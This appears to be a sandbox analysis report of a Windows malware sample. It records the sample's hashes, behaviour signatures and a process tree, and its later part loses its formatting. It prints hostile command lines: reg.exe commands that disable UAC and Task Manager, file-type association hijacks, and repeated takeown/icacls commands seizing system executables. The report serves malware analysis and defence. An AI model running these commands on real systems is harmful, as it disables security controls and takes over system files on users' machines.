Analysis

max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28-10-2024 06:10

Static task: static1

Behavioral task: behavioral1
  Sample: e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
  Resource: win7-20241023-en

Behavioral task: behavioral2
  Sample: e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
  Resource: win10v2004-20241007-en

General

Target: e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Size: 550KB
MD5: ef66bc948ca5ff1bd4e76191adc11b0a
SHA1: d1fb64af325b0cfaa165869d8fcafea672849fd3
SHA256: e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25
SHA512: 914de2b160d607dfb87c19e52006c4c3724f8d96f7a7ae7d31d1219539745fc73a77e2484cc23459f33b16ee16f8356356380f759988e15dddbe5fd707b905d8
SSDEEP: 6144:/pW2bgbbV28okoS1oWMkdlZQ5iinNrv26FYLIcw/3Scg1IReqYKztp0YcAvq:/pW2IoioS6p8IReqYKztp0YTvq
Malware Config
Signatures

UAC bypass
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (process: reg.exe)

Disables Task Manager via registry modification

Possible privilege escalation attempt (64 IoCs)
  takeown.exe PIDs: 4068, 3076, 4428, 5712, 1736, 548, 3360, 3204, 5452, 5700, 3560, 5284, 2788, 4228, 2572, 5736, 6004, 5184, 3644, 5444, 2056, 3156, 5300, 3112, 840, 5144, 4712, 5632, 3812
  icacls.exe PIDs: 3824, 3176, 1084, 5744, 3340, 1608, 4608, 3132, 3140, 5444, 3044, 5188, 5596, 5816, 5132, 3960, 5424, 6020, 3476, 1556, 5016, 3760, 3896, 2280, 5780, 5260, 2164, 1196, 5092, 4792, 5968, 3540, 5200, 3292, 5380

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation (process: e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe)

Modifies file permissions (1 TTP, 64 IoCs)
  takeown.exe PIDs: 4232, 3096, 3112, 2080, 4712, 5700, 5792, 1012, 3540, 5828, 2956, 3120, 4628, 5920, 1736, 2056, 5996, 1664, 4736, 744, 5464, 3252, 3156, 5144, 3360, 5712, 5660, 5536, 5196, 3708, 1948, 5688, 5792, 4428, 4276
  icacls.exe PIDs: 2808, 5996, 4380, 6124, 3184, 1608, 4312, 1556, 1196, 6020, 208, 5716, 2300, 3960, 5856, 5968, 5524, 5596, 2632, 3292, 904, 5016, 5444, 5816, 6072, 4608, 5660, 4948, 5780

Modifies system executable filetype association (2 TTPs, 1 IoC)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe BATCF %1" (process: e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe)

File and Directory Permissions Modification: Windows File and Directory Permissions Modification (1 TTP)

Drops file in System32 directory (1 IoC)
  File opened for modification: C:\Windows\System32\UtcDecoderHost.exe (process: e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe)

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Modifies registry class (10 IoCs)
  All values set by e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe:
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe HTMWF %1"
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe NTPAD %1"
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe NTPAD %1"
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe NTPAD %1"
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe JPGIF %1"
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe VBSSF %1"
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe NTPAD %1"
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe BATCF %1"
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe CMDSF %1"
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe RTFDF %1"

Modifies registry key (1 TTP, 2 IoCs)
  reg.exe PIDs: 1224, 1764

Suspicious behavior: EnumeratesProcesses (21 IoCs)
  PID 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe (21 entries, all for this process)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  PID 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe

Suspicious use of AdjustPrivilegeToken (22 IoCs)
  Token SeDebugPrivilege: PID 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
  Token SeTakeOwnershipPrivilege: takeown.exe PIDs 1664, 532, 4068, 1104, 1184, 4212, 4864, 3432, 1352, 440, 32, 548, 4736, 4492, 2572, 1480, 4712, 3112, 2956, 2084, 3708

Suspicious use of WriteProcessMemory (64 IoCs)
  PID 1112 (e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe) wrote to the memory of the following child PIDs; each write is reported twice, and the procid_target value is given in parentheses:
  1224 (85), 1764 (86), 1664 (103), 3656 (105), 532 (107), 3136 (109), 4068 (111), 2496 (113), 1104 (115), 1956 (117), 4212 (118), 804 (119), 4864 (120), 1108 (125), 1184 (127), 2300 (128), 3432 (129), 3396 (131), 440 (135), 4520 (136), 1352 (138), 3960 (140), 32 (142), 1248 (143), 548 (144), 3448 (149), 4736 (151), 3876 (153), 4492 (155), 4948 (157), 2572 (159), 1988 (161)
Processes

[1] C:\Users\Admin\AppData\Local\Temp\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe (PID 1112)
    "C:\Users\Admin\AppData\Local\Temp\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe"
    - Checks computer location settings
    - Modifies system executable filetype association
    - Drops file in System32 directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\reg.exe (PID 1224)
      "C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      - UAC bypass
      - Modifies registry key

  [2] C:\Windows\System32\reg.exe (PID 1764)
      "C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      - Modifies registry key

  [2] C:\Windows\System32\takeown.exe (PID 1664)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\bfsvc.exe"
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 3656)
      "C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 532)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\HelpPane.exe"
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 3136)
      "C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 4068)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\hh.exe"
      - Possible privilege escalation attempt
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 2496)
      "C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 1104)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\splwow64.exe"
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 1956)
      "C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 4212)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\winhlp32.exe"
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 804)
      "C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 4864)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\write.exe"
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 1108)
      "C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 1184)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\raserver.exe"
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 2300)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Modifies file permissions

  [2] C:\Windows\System32\takeown.exe (PID 3432)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\msra.exe"
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 3396)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 440)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 4520)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 1352)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 3960)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Possible privilege escalation attempt
      - Modifies file permissions

  [2] C:\Windows\System32\takeown.exe (PID 32)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 1248)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 548)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\logagent.exe"
      - Possible privilege escalation attempt
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 3448)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 4736)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 3876)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 4492)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 4948)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Modifies file permissions

  [2] C:\Windows\System32\takeown.exe (PID 2572)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"
      - Possible privilege escalation attempt
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 1988)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 4712)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 4724)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 1480)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 3992)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 3112)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\runas.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 3340)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Possible privilege escalation attempt

  [2] C:\Windows\System32\takeown.exe (PID 2956)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 4504)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 2084)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 2784)
      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 3708)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\icacls.exe (PID 2280)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Possible privilege escalation attempt

  [2] C:\Windows\System32\takeown.exe (PID 2056)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Possible privilege escalation attempt

  [2] C:\Windows\System32\icacls.exe (PID 1260)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 4060)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"

  [2] C:\Windows\System32\icacls.exe (PID 1556)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Possible privilege escalation attempt

  [2] C:\Windows\System32\takeown.exe (PID 60)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"

  [2] C:\Windows\System32\icacls.exe (PID 5092)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Possible privilege escalation attempt

  [2] C:\Windows\System32\takeown.exe (PID 1280)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"

  [2] C:\Windows\System32\icacls.exe (PID 1348)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 4468)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"

  [2] C:\Windows\System32\icacls.exe (PID 3292)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Possible privilege escalation attempt
      - Modifies file permissions

  [2] C:\Windows\System32\takeown.exe (PID 3120)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Modifies file permissions

  [2] C:\Windows\System32\icacls.exe (PID 4988)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 1736)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Modifies file permissions

  [2] C:\Windows\System32\icacls.exe (PID 512)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 2004)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"

  [2] C:\Windows\System32\icacls.exe (PID 3892)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 3644)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Possible privilege escalation attempt

  [2] C:\Windows\System32\icacls.exe (PID 4608)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Possible privilege escalation attempt
      - Modifies file permissions

  [2] C:\Windows\System32\takeown.exe (PID 3156)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions

  [2] C:\Windows\System32\icacls.exe (PID 2808)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Modifies file permissions

  [2] C:\Windows\System32\takeown.exe (PID 1132)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"

  [2] C:\Windows\System32\icacls.exe (PID 1012)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 1948)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Modifies file permissions

  [2] C:\Windows\System32\icacls.exe (PID 4512)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 744)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Modifies file permissions

  [2] C:\Windows\System32\icacls.exe (PID 2696)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 2056)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Modifies file permissions

  [2] C:\Windows\System32\icacls.exe (PID 4792)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 3200)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"

  [2] C:\Windows\System32\icacls.exe (PID 3984)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 3204)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"

  [2] C:\Windows\System32\icacls.exe (PID 1556)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Modifies file permissions

  [2] C:\Windows\System32\takeown.exe (PID 4276)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Modifies file permissions

  [2] C:\Windows\System32\icacls.exe (PID 3624)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 840)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Possible privilege escalation attempt

  [2] C:\Windows\System32\icacls.exe (PID 4640)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 3812)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Possible privilege escalation attempt

    [3] C:\Windows\System32\Conhost.exe (PID 1280)
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

  [2] C:\Windows\System32\icacls.exe (PID 1432)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

  [2] C:\Windows\System32\takeown.exe (PID 3360)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions

  [2] C:\Windows\System32\icacls.exe (PID 208)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Modifies file permissions

  [2] C:\Windows\System32\takeown.exe (PID 3236)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"

  [2] C:\Windows\System32\icacls.exe (PID 3760)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Possible privilege escalation attempt

  [2] C:\Windows\System32\takeown.exe (PID 4232)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Modifies file permissions

  [2] C:\Windows\System32\icacls.exe (PID 3824)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Possible privilege escalation attempt

  [2] C:\Windows\System32\takeown.exe (PID 5092)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"

  [2] C:\Windows\System32\icacls.exe (PID 904)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Modifies file permissions

  [2] C:\Windows\System32\takeown.exe (PID 3540)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
      - Modifies file permissions

  [2] C:\Windows\System32\icacls.exe (PID 1608)
      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      - Possible privilege escalation attempt
      - Modifies file permissions

  [2] C:\Windows\System32\takeown.exe (PID 3536)
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4240
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5212
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5260
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5300
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5380
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5444
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5476
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5524
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5588
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5632
-
-
